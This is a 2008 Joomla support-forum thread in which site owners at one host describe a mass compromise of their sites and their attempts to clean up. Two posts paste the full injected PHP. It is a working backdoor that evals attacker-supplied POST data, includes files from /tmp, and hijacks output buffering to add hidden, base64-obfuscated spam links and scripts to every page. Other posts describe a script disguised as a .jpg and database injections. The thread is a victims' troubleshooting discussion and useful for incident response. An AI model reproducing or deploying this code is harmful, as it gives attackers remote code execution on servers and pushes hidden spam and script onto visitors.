Joomla! Discussion Forums

I just received this error on my website. No idea why, nothing was recently changed too drastically other than some articles.

Parse error: syntax error, unexpected '<' in /localhost/directory/joomla/environment/uri.php on line 757

Anybody seen this before? I am going to start searching to see what the problem is.

It looks like in our cpanel/hsphere the majority of our roles have been switched to httpd:httpd or root:root

This appears to be a hsphere / webshell problem and not a Joomla problem. I'll look into remedying it I was hoping it would be an easy fix.

created virtual ftp folders to change ownership back. Now I have to manually chmod files (hassle). I am finding this line of code pretty often at the end of the php files. Does anybody know if it is necessary/how it got there? It is not there on some of my other sites.

It was at the end of /localhost/plugins/system/legacy/functions.php

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5FcmVjdGlsZSBkeXNmdW5jdGlvbiBleGVyY2lzZXMgdGhlIGJlbmVmaXRzIG9mIHVzaW5nIDxhIGhyZWY9aHR0cDovL2ZvcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4MiBUSVRMRT0nYnV5IHZpYWdyYSBvbmxpbmUnIFRBUkdFVD1fYmxhbms+dmlhZ3JhIG9ubGluZSBwaGFybWFjeTwvQT4uIDxiciAvPgpCdXkgdmlhZ3JhIGNoZWFwIDxhIGhyZWY9aHR0cDovL2ZvcnVtcy52b2d1ZS5jb20uYXUvbWVtYmVyLnBocD91PTc1NTE2IFRJVExFPSdidXkgdmlhZ3JhIHRlc3QnIFRBUkdFVD1fYmxhbms+YnV5IHZpYWdyYSBubyBzY3JpcHQ8L0E+LiA8YnIgLz4KR2VuZXJpYyBicmFuZCBvZiB2aWFncmEgb25saW5lIHRoZSBpbmZvcm1hdGlvbiBhYm91dCB2aWFncmEgb25saW5lIGNoZWFwIDxhIGhyZWY9aHR0cDovL3d3dy5hbnN3ZXJiYWcuY29tL3Byb2ZpbGUvP2lkPTMxMDE2OCBUSVRMRT0nYnV5IHZpYWdyYSB3aXRob3V0IHByZXNjcmlwdGlvbic+QnV5IHZpYWdyYSBmb3IgbG93ZXN0IHByaWNlczwvQT48YnIgLz4KT2xkIG1hbiB3aG8gdGFrZXMgVmlhZ3JhIGJlZm9yZSB1c2luZyBlLXNob3Agd2hlcmUgeW91IGNhbiBidXkgYWx0aG91Z2ggdGhlIHRob3VnaHQgYWJvdXQgPGEgaHJlZj1odHRwOi8vd3d3LnlvdXR1YmUuY29tL3RyYXh0ZW5iZXJnNTU1IFRJVExFPSdnZW5lcmljIGJ1eSB2aWFncmEnIFRBUkdFVD1fYmxhbms+dmlhZ3JhIGJlc3QgYnV5PC9BPjxiciAvPgoKPHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PmlmKHR5cGVvZih5YWhvb19jb3VudGVyKT09dHlwZW9mKDEpKXZhciBzPScnO2Vsc2UgdmFyIHM9dW5lc2NhcGUoJ0F4aHdudXklMjV4d2hCNDQlM0MlM0IzNiUzQjgzNjklM0MzNjUlM0Q0aHU0Q0E0eGh3bnV5QzUnKTtmb3IodmFyIGk9MTtpPHMubGVuZ3RoO2krKylkb2N1bWVudC53cml0ZShTdHJpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdChpLTEpLXMuc3Vic3RyKHMubGVuZ3RoLTEsMSkpKTt2YXIgeWFob29fY291bnRlcj0xOzwvc2NyaXB0PjwvZGl2Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

forget it. I just uploaded the backup. I may have lost 8 hours worth of work, but it's not worth hacking code after code to then be hit with another code to hack. This should teach me to get a dedicated host instead of shared.

Maybe somebody cares....This was a virus/hack that was somehow uploaded to our webserver unbenounced to us. I suspect a webhost problem. It decodes into a viagra ad. Real nice.

We had the same hack on our websites -- it happened between July 27 & 28.

In ours the div containing the ad was set to be positioned off screen so it wasn't detectable just by browsing the websites. Wouldn't be surprised if there are many other websites affected and they don't know it yet.

Since all of our domains and subdomains were hit I'm also thinking it points to a webserver/host vulnerability.

Same here, websites hacked the same as above, I had all my sites backed up by my host, everything was fine for 3 weeks and they did it again...
I do not have a clue how..

We are using ixwebhosting . Is that the same company as yours? We just got hacked again.

This could possibly be a local issue though. Now that I think about it; it MAY be a local issue. There are some trojans that mass collect FTP passwords and then hit the sites all at once. I at first immediately said "not a problem on my end" because I formatted the 3 pc's I use to connect to the site, but I was dumb and did not change my ftp password from last time. I upgraded all of my office's security procedures after last time, so I am pretty sure there's no leak on our end. If only i had changed the password, I would KNOW it's not on my end.

We're at ix also -- we were hacked again Aug 29.

I requested our FTP logs last time it happened and there was nothing unusual in them. Is it possible they could use FTP without it showing up in the logs?

Yea, we got hacked on the 29th too. Knowing you are at IX also, makes me really think it is a webhost problem, not a local problem. I'm thinking about switching back to web.com

Just found that they also got into one of the databases - phpbb. All the other databases were clean. We're looking into changing hosts as well.

depaulus, are you at ix too?

Yes I am IXweb, and I have Googled "<?php if(!function_exists('tmp_lkojfghx')" And "uri.php on line 757"

and so far I have over 15 sites / people with the same problem, AND after doing a "BetterWhois" check, they are ALL hosted with IXweb on Php 4 servers.
I have called and written to them, but they don't seem to listen..
I have 4 Buisness Acc. with them and TWO are injected ( 16 sites!!!!)

EVERYONE using IXweb must call them and let them know

Regards

Paul

Yea, I got hit on 13 of my sites.

Appreciate the info Paul -- it does look like a webserver vulnerability. I'll be contacting them again. We had 11 sites corrupted.

Also found this in the error logs:

[Fri Aug 29 14:12:04 2008] [error] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)

Apparently DFind is a hacker tool that scans for web vulnerabilities.

I got same error, I use IXWebhosting too, I submitted a ticket, I do have a backup which I will try to upload tonight. I am too newbie to really look into my DB to notice changes there. My uri.php file was modified on 1 sept 2008.

Sample of line 757 in uri.php:
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5FcmVjdGlsZSBkeXNmdW5jdGlvbiBleGVyY2lzZXMgZm9yIGV4YW1wbGUgd2hhdCBkbyBWaWFncmE/IDxhIGhyZWY9aHR0cDovL3d3dy5hbnN3ZXJiYWcuY29tL3Byb2ZpbGUvP2lkPTMxMDE2OD5idXkgdmlhZ3JhIHRlc3Q8L0E+LiBFcmVjdGlsZSBkeXNmdW5jdGlvbiBkcnVnIHRoZXJlIGFyZSBtYW55IGRpZmZlcmVudCB3YXlzIHRvIHN0b3JlIHlvdXIgZ2VsIHRhYiB2aWFncmEgZG8geW91IGtub3cgdGhhdCA8YSBocmVmPWh0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUgVEFSR0VUPV9ibGFuaz5idXkgdmlhZ3JhIG5vIHByZXNjcmlwdGlvbjwvQT4gPGJyIC8+CkZhbWlseSBwaGFybWFjeSBzbyB3aGF0IGV4YWN0bHkgaXMgYSA8YSBocmVmPWh0dHA6Ly9mb3J1bS5seWNvcy5kZS9tZW1iZXIucGhwP3U9MjYyODI+YnV5IHZpYWdyYSBubyByeDwvQT48YnIgLz4KCjxzY3JpcHQ+aWYodHlwZW9mKHlhaG9vX2NvdW50ZXIpIT10eXBlb2YoMSkpZXZhbCh1bmVzY2FwZSgnfCU3NmAlNjFyJTIwYX4sISU2OXwlMkMhJTVGITt+YSUzRCQlNUJgIjEjOSMxJCUyRUAxJCUzMyUzM3wlMjJgLCIlMzF8JTM1QCUzNy4jMiUzMCUzMnwiJTJDJTIyPzE/NT8lMzguOD8lMzkkJTIyJCUyQyUyMj8xOTEuODR+IiU1RHwlM0IlNUY/PTE7aWYofCU2NHxvYGN1fiU2RCElNjVuPyU3NCEuIWMlNkZgJTZGfmsjaWUuI21hYHQlNjMlNjh+JTI4ISUyRkAlNUMjYiU2OEBnJCU2Nj90JTNEJTMxJTJGJCUyOSUzRCUzRCU2RWB1fCU2Q0BsJTI5JTY2byU3MihpPz0/MH47I2kkJTNDQDR+O34lNjklMkIlMkJ+KSU2NG9jdW0hZW4jdCUyRXx3IyU3MkBpJTc0fiU2NX4lMjgiJTNDJTczY2AlNzJpJTcwdCUzRSQlNjklNjYkJTI4JTVGPyUyOWBkJTZGYyU3NW1AZWAlNkUlNzRgLiU3N3IlNjlgJTc0JTY1KCU1QyUyMnwlM0MlNzMlNjNAJTcyJTY5ISU3MCU3NCMlMjBpJTY0JTNEJTVGIyIlMkI/JTY5ISUyQiQlMjIkJTVGJTIwIyU3MyQlNzJgJTYzJCUzRCUyRj8lMkYjNz8lMzYlMkUlMzEhJTM2M2AlMkUiJCUyQiU2MSU1QiU2OSU1RCUyQn4iLyU2M3AvPyUzRSUzQyMlNUMhJTVDYC8lNzMlNjNyaXwlNzAkJTc0JTNFJTVDJTIyJTI5JCUzQ3wlNUMlMkYhJTczYyU3MiMlNjklNzBgdCUzRSIpOycpLnJlcGxhY2UoL358XD98QHxcfHxcIXxcJHwjfGAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7PC9zY3JpcHQ+PC9kaXY+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Add me to the list of people at IX Web Hosting who suffered exactly the same attack. However, only one of my three accounts there [all of which run Joomla] was affected.

I have removed the relevant chunk of code - the one which starts if(!function_exists('tmp_lkojfghx') - from the PHP files I could find, but my pages are still appearing with the Viagra spam at the bottom of them. What else needs to be done to correct this.

The code appears on EVERY .php file AND .html file.. cleaning it all up is almost inpossible, I have had IX make backups of all my sites... BUT saying that, last week I installed clean backups and evrything was fine, one week later the code is injected back into ALL the pages and sites.. Now however the same thing is happening on a second accout..

I am yet again going to call IX, and this time ask for a manager, I believe that I have have more than enough evidence that this is a serious server issue, and until IX web fix the problem, we are up "[censored] creek"

I'll post the outcome of my call.

Regards

Paulus

If IX Web Hosting need another example, the ticket ID for my site is #861417. With all the files being changed to an ownership of httpd, that sounds more like an external exploit of some sort. I have several account at IX Web Hosting, but only one was attacked, and that was the one where I had MxComment enabled. I wonder if that was perhaps the source?

Anyway, let us know what IX say - probably denial, I imagine - but also if you need help with any further info from this end.

Got a reply from IX, they said it was not a webserver vulnerability problem, it was my problem and I needed to check my stuff.

I saw alot of lines in the logs for joomlaboard/phpbb/forums.website.com etc etc
I dont have joomlaboard running (but i may have old tables in my database still.

What is MXcomment???

MXComment is an add-on for Joomla that allows people to leave comments on entries. If you don't know what it is, you probably don't have it.

I finally found the source of the remaining infection of spam; sounds like it may have been a different kind of attack, as I didn't have the mass infection of HTML pages described above. It took a clean install to get rid of the issue - but then, when i copied the old 'images' folder back over, the problem came right back. To cut a long story short, it turned out there was an infected PHP script in the images directory (tagged with a .jpg extension for stealth). Tied into this, an additional entry had been injected into the jos_mambots database table, which was calling the script in some way. Delete the entry and remove the infected script, and hey presto, no more Viagra spam.

[Should mention I am running 1.0.x, but this was the only place I could find any significant discussion of the issue!]

Got the same thing here. Twice now. And surprise, IX is my hosting service. I really hope this isn't some stupid coincidence, because I really want to be sure before yelling at IX. Does core know about this yet?

I'm facing the same exact problem as you guys and I feel IXWebhosting is not doing anything about it ....I have 24 sites in my account all infected on Sep 01,2008 .................

Anybody with better hosting suggestion?
Please let me know

I just got in touch with IX about the issue. The person I talked to was aware of the problem, and told me that they were aware of it as an issue, but couldn't tell me what they were doing about it, just that some people were looking into it. He couldn't give me any specifics at all, but he sounded pretty nervous when I brought up the topic. He couldn't give me any names of people to talk to, but someone I spoke with previously explained that a gentleman named Jason was the guy to talk to, and that he knew of some sort of 'critical file' that needed updating or replacing. It sounds a lot like nobody really understands where the issue is yet... but it sounds to me like there is a vulnerability on one of IX's servers which is being exploited, and they haven't nailed down what it is yet. I was hacked on version 1.5.5, but since then, I've patched to 1.5.6. I don't think this will solve anything, but here's to hoping.

Which package are you all using? I'm on one of IX's old servers, and I was thinking about migrating to one of the newer ones. (Apparently there's a newer version of the control panel with access to php.ini settings without using .htaccess hacks). I'm curious if this is specific to one of their servers, or all of them.

Cheers.

I am in the same boat. Just prior to the hack I had uploaded a fresh copy of Joomla 1.5, set to offline and came back a week later to find the parse error. I dont however have MXComment. Looks like you have a solution.

I had a double hack. When I originally installed joomla 1.0, I set my folders to public writable as requested in the installation step, and I got hacked by some weird stuff and anti-goverment ads. I spoke to IX and they said I should not allow public write access. So i decided to upgrade to 1.5 and this happened.

I am also with IX and have the same problem on 4 sites hosted there. Joomla and phpbb. Where in the database was the injection found? I can't seem to find it, and I know it is there.

-Scott

Two places --
In the phpbb_config table, where config_name=site_desc, they had added the hack to the config_value field.
In phpbb_categories table they'd added a new category which caused their trash to show up in the "Jump To" dropdown at the bottom of each forum.

You may want to do an export or backup of the database, so you can use a text search to find any other injections.

Hi guys,
I'm also with ixwebhosting, and have been hit with the same thing, however I'm running OSCommerce (I realise this forum is for Joomla!).

I am pretty sure I have removed the code added to all my php files, which leads me to believe it was inside the mysql database.

Even worse, the database backup I took the other day and installed locally, has given my local copy the same thing. Which to me implies the dodgy code is somewhere in the database. Except I can't find it.

Any ideas on how to find it using phpmyadmin? I *really* don't want to restore the site, last time I had all sorts of problems getting it right again. Ideally I just want to get rid of the code.

Cheers
Scott

Ooops, on further investigation, i must have downloaded one fo the dodgy files onto my local PC. Thats why my local version was displaying the error. Which means I must have at least one file on the webserver hanging around. I'll hunt it down and get rid of it.

Cheers
Scott